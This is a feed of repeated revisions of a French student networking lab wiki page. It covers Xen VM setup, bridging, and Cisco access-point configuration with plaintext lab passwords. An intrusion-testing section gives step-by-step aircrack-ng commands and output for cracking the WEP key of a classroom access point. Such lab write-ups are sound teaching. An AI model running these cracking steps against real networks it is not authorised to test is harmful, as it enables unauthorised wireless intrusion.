 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump --encrypt wep wlan0mon&lt;br /&gt;
- Notes le SSID de la machine à attaquer, ici cracotte03 : 04:DA:D2:9C:50:53&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-01.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56353</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56353"/>
				<updated>2021-11-12T11:02:08Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump --encrypt wep wlan0mon&lt;br /&gt;
- Notes le SSID de la machine à attaquer, ici cracotte03 : 04:DA:D2:9C:50:53&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-01.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56351</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56351"/>
				<updated>2021-11-12T11:01:53Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump --encrypt wep wlan0mon&lt;br /&gt;
- Notes le SSID de la machine à attaquer, ici cracotte03 : 04:DA:D2:9C:50:53&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-01.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56350</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56350"/>
				<updated>2021-11-12T11:01:17Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
